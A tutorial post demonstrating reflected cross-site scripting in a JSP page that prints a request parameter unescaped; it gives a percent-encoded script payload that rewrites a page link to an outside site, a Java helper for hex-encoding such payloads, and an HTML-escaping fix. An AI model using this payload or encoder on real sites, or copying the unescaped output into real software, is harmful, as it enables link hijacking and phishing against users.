XSS Cross-Site Scripting Attack 2

JSP code:

<%@ page language="java" contentType="text/html; charset=UTF-8"
	pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
	String name = request.getParameter("name");
%>
Welcome <%=name %><br>
<a href="#">Click to Download</a>
</body>
</html>

The parameter entered in the browser is:

name=yang%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%66%75%6E%63%74%69%6F%6E%28%29%20%7B%76%61%72%20%6C%69%6E%6B%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%61%22%29%3B%6C%69%6E%6B%5B%30%5D%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%63%73%64%6E%2E%6E%65%74%2F%22%3B%7D%3C%2F%73%63%72%69%70%74%3E

Converting the hexadecimal part that follows "yang" back to ASCII gives:

name=yang<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://www.csdn.net/";}</script>

With the XSS filter disabled, the effect in IE8 is:


The status bar in the lower-left corner now shows http://www.csdn.net/ as the link target, while the source code has "#".

In this situation 360 Secure Browser is no longer safe either, because the XSS filter has been disabled.
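The JSP above is affected because `<%=name %>` writes the request parameter into the page without output encoding, so protection depends entirely on the browser's XSS filter. As an added example (not code from the original post), the class below shows a hypothetical `escapeHtml` helper applied to a constructed, percent-encoded sample value; the class name and the sample input are assumptions made for illustration.

```java
import java.net.URLDecoder;

public class HtmlEscapeDemo {

    // Encode the characters that are significant in HTML text and quoted
    // attribute values, so the parameter is rendered as text, not markup.
    static String escapeHtml(String input) {
        if (input == null) {
            return ""; // a missing parameter would otherwise print "null"
        }
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break; // must be encoded too, or entities can be smuggled in
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: "yang" followed by an empty script element,
        // percent-encoded in the same style as the parameter on this page.
        String raw = "yang%3C%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E";

        // The servlet container performs this decoding before
        // request.getParameter("name") returns the value.
        String name = URLDecoder.decode(raw, "UTF-8");

        // What the original JSP writes into the response: live markup.
        System.out.println("unescaped: Welcome " + name + "<br>");

        // What the page should write: the same characters as inert text.
        System.out.println("escaped:   Welcome " + escapeHtml(name) + "<br>");
    }
}
```

In the JSP, the output line would become `Welcome <%= HtmlEscapeDemo.escapeHtml(name) %><br>`; JSTL's `<c:out value="${param.name}"/>` gives the same result, because it escapes XML characters by default.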

Java code to convert ASCII to hexadecimal:

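	// Print each character of an ASCII string as a percent-encoded byte (%XX).
	public static void convert(String ascii) {
		char[] ches = ascii.toCharArray();
		for (char ch : ches) {
			// %02X zero-pads to two hex digits; the original %H formatted the
			// character's hashCode() and printed one digit for values below 0x10.
			System.out.format("%%%02X", (int) ch);
		}
	}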

